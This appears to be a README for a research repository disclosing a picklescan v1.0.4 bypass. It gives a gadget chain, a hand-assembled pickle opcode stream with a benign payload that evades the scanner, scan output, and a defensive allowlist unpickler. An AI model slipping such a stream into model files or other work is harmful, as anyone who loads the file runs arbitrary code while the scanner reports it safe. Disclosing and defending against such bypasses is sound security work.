Picklescan v1.0.4 Bypass PoC – MFV Submission

⚠️ SECURITY RESEARCH ONLY – DO NOT LOAD IN PRODUCTION

This repository contains a proof-of-concept demonstrating that picklescan v1.0.4 fails to detect a malicious pickle payload that achieves Arbitrary Code Execution (ACE).

Vulnerability

picklescan v1.0.4 rates importlib.import_module and xmlrpc.server.resolve_dotted_attribute as merely suspicious, not as dangerous globals. A gadget chain combining these two functions resolves os.system() or exec() at load time without ever triggering a dangerous classification.

Gadget Chain

xmlrpc.server.resolve_dotted_attribute(
    importlib.import_module('builtins'),
    'exec'
)(arbitrary_python_code)
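The chain can be verified interactively in plain Python. The sketch below resolves builtins.exec through the same two functions as above, but runs a benign print in place of attacker code:

```python
import importlib
from xmlrpc.server import resolve_dotted_attribute

# Step 1: import_module yields the builtins module without a direct
# GLOBAL reference to builtins.exec appearing in a pickle stream.
mod = importlib.import_module('builtins')

# Step 2: resolve_dotted_attribute walks getattr() over a dotted name
# (rejecting only names that start with '_'), returning builtins.exec.
fn = resolve_dotted_attribute(mod, 'exec')

# Step 3: the resolved callable executes arbitrary Python (benign here).
fn("print('gadget chain resolved builtins.exec')")
```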

Files

  • poc_model.pkl – Malicious pickle file (picklescan reports infected_files=0)
  • poc_picklescan_bypass.py – Full PoC script with 3 variants
  • create_hf_poc_model.py – Script to generate the PoC model
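The generation script itself is not reproduced here. As an illustration only, a chain like this can be hand-assembled from protocol-0 pickle opcodes (GLOBAL `c`, MARK `(`, STRING `S`, TUPLE `t`, REDUCE `R`); this sketch substitutes a harmless print for a real payload:

```python
import pickle

# Hand-assembled protocol-0 stream equivalent to:
#   resolve_dotted_attribute(import_module('builtins'), 'exec')(code)
# The only GLOBAL opcodes name import_module and
# resolve_dotted_attribute, which picklescan v1.0.4 rates as merely
# suspicious -- so the scan stays at infected_files: 0.
payload = (
    b"cxmlrpc.server\nresolve_dotted_attribute\n"  # push the resolver
    b"(cimportlib\nimport_module\n"                # MARK, push import_module
    b"(S'builtins'\ntR"                            # import_module('builtins')
    b"S'exec'\ntR"                                 # resolve builtins.exec
    b"(S'print(\"benign payload ran\")'\ntR"       # exec(<code>) -- benign here
    b"."                                           # STOP
)

pickle.loads(payload)  # prints: benign payload ran
```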

Scan Result

$ picklescan poc_model.pkl
infected_files: 0
issues_count: 0
globals: importlib.import_module [suspicious], xmlrpc.server.resolve_dotted_attribute [suspicious]

Affected Versions

  • picklescan <= 1.0.4

Impact

Any .pkl model file uploaded to the HuggingFace Hub or another model registry can carry this payload. picklescan reports infected_files: 0, giving users false confidence that the file is safe; loading it with pickle.loads() or torch.load() (with weights_only=False) then executes arbitrary code.
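A denylist scanner cannot enumerate every such gadget; the robust defense is an import allowlist enforced at load time via Unpickler.find_class. A minimal sketch (the allowlist contents are illustrative, not a recommendation):

```python
import io
import pickle

class AllowlistUnpickler(pickle.Unpickler):
    """Refuse any pickled global not on an explicit allowlist."""
    # Illustrative allowlist -- extend for the types your models need.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

# The gadget chain's very first GLOBAL opcode already trips the allowlist,
# before any code from the payload can run:
gadget = (
    b"cxmlrpc.server\nresolve_dotted_attribute\n"
    b"(cimportlib\nimport_module\n"
    b"(S'builtins'\ntRS'exec'\ntR(S'print(1)'\ntR."
)
try:
    AllowlistUnpickler(io.BytesIO(gadget)).load()
except pickle.UnpicklingError as e:
    print(e)  # blocked global: xmlrpc.server.resolve_dotted_attribute
```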
